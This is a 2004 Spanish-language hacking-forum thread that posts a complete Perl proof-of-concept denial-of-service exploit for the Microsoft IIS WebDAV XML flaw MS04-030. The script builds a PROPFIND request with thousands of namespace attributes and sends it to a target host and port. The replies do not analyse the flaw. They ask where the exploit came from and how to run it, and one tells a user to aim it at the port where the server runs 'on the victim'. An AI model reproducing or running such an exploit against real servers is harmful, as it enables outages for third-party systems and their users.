elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 18:45  


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Microsoft IIS WebDAV XML Denial of Service Exploit (MS04-030)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Microsoft IIS WebDAV XML Denial of Service Exploit (MS04-030)  (Leído 1,088 veces)
juanchoc

Desconectado Desconectado

Mensajes: 24


Sad But True: el agua de mi retrete gira a la izq.


Ver Perfil
Microsoft IIS WebDAV XML Denial of Service Exploit (MS04-030)
« en: 22 Octubre 2004, 07:58 »

#!/usr/bin/perl
# IIS BlowOut
# POC exploit for MS04-030. Found by Amit Klein.
# incognito_ergo yahoo com
# usage: perl ms04-030_spl.pl host port

use IO::Socket;

$port = @ARGV[1];
$host = @ARGV[0];


$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort =>
$port,Proto => "TCP");


for ($count=1; $count<9999; $count++) #more than nuff
{

$xmlatt = $xmlatt. "xmlns:z" . $count . "=\"xml:\" ";

}



$xmldata = "<?xml version=\"1.0\"?>\r\n<a:propfind xmlns:a=\"DAV:\" " .
$xmlatt .
">\r\n<a:prop><a:getcontenttype/></a:prop>\r\n</a:propfind>\r\n\r\n";

$l=length($xmldata);

$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost:
$host\nContent-length: $l\n\n$xmldata\n\n";

syswrite($socket,$req,length($req));

close $socket;
En línea
Sir_Neo

Desconectado Desconectado

Mensajes: 203


$ir ||ê0


Ver Perfil WWW
Re: Microsoft IIS WebDAV XML Denial of Service Exploit (MS04-030)
« Respuesta #1 en: 22 Octubre 2004, 22:01 »

Gracias por el exploit, pero podrías haber dejado un poco más de información y de donde lo has sacado.
En línea

Si juegas con el mejor, muere como los demás

http://www.lepeonline.net/
juanchoc

Desconectado Desconectado

Mensajes: 24


Sad But True: el agua de mi retrete gira a la izq.


Ver Perfil
Re: Microsoft IIS WebDAV XML Denial of Service Exploit (MS04-030)
« Respuesta #2 en: 23 Octubre 2004, 11:09 »

Mas informacion?
El titulo lo dice todo....
Y podes buscarlo (MS04-030).
Saludos

P.D.:
Lo saque de un newsgroup privado de seguridad.
Pero casi seguro lo ya lo podes encontrar dando vueltas por cualquier lado.
En línea
Mr Dialup

Desconectado Desconectado

Mensajes: 164


Tenganme paciencia. XDDD


Ver Perfil WWW
Re: Microsoft IIS WebDAV XML Denial of Service Exploit (MS04-030)
« Respuesta #3 en: 25 Octubre 2004, 05:37 »

alguien podria explicar como funciona?
En línea
fandango
Another
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.953


Powered By Slackware!


Ver Perfil
Re: Microsoft IIS WebDAV XML Denial of Service Exploit (MS04-030)
« Respuesta #4 en: 25 Octubre 2004, 10:41 »

Ahi mismo lo dice mira bien.
usage: perl ms04-030_spl.pl host port

Saludos
En línea

Mr Dialup

Desconectado Desconectado

Mensajes: 164


Tenganme paciencia. XDDD


Ver Perfil WWW
Re: Microsoft IIS WebDAV XML Denial of Service Exploit (MS04-030)
« Respuesta #5 en: 27 Octubre 2004, 13:24 »

perdon mi ignorancia pero... que puerto iria?
En línea
Ambolius


Desconectado Desconectado

Mensajes: 1.338


/España/Guadalajara


Ver Perfil
Re: Microsoft IIS WebDAV XML Denial of Service Exploit (MS04-030)
« Respuesta #6 en: 27 Octubre 2004, 22:22 »

Mr. Dialup... o nos tomas el pelo, o no te has dado cuenta de lo que va este tema. Mira el titulo y veras que pone: "Microsoft IIS WebDav ...". Que puerto crees que habra que poner?

pues el puerto donde este corriendo este servidor en la victima...
En línea

Un informático a otro:
- ¿Cuantos eran los Dálmatas?
- 101.
- Por el culo te la hinco.
Mr Dialup

Desconectado Desconectado

Mensajes: 164


Tenganme paciencia. XDDD


Ver Perfil WWW
Re: Microsoft IIS WebDAV XML Denial of Service Exploit (MS04-030)
« Respuesta #7 en: 28 Octubre 2004, 12:26 »

Pido mil disculpas, me siento avergonzado
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Un exploit creado por Microsoft es publicado en foros chinos
Noticias
wolfbcn 0 282 Último mensaje 8 Mayo 2012, 13:02
por wolfbcn
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines